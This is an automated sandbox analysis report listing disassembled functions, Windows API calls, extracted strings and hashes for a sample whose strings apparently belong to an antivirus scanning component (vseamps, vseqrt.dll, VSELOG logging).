Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFDAC12FD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: 413fb9709c9d2eca0f7d71b28bebe47418ccfc59568bb11b0d52390be94034ce
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: E6F068727196558AEBD68F28A452A297BD0EB483D4F548039D59D83B04D63CD4508F08

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseGlobalInit, xrefs: 00000001400010C8
msi.dll, xrefs: 0000000140001042
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseInit, xrefs: 00000001400010FA
MsiLocateComponentW, xrefs: 0000000140001062
vseRelease, xrefs: 0000000140001115
vseGet, xrefs: 000000014000114B
vseGlobalRelease, xrefs: 00000001400010DF
vseSet, xrefs: 0000000140001166
vseExec, xrefs: 0000000140001130

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

action, xrefs: 0000000140003020
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5
?, xrefs: 0000000140002FFE

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtInit, xrefs: 0000000140002BA3
vseqrt.dll, xrefs: 0000000140002B7E
vseqrtAdd, xrefs: 0000000140002BD5
vseqrtRelease, xrefs: 0000000140002BBA

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: done, pHandle=%p, xrefs: 00000001400035CC
amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
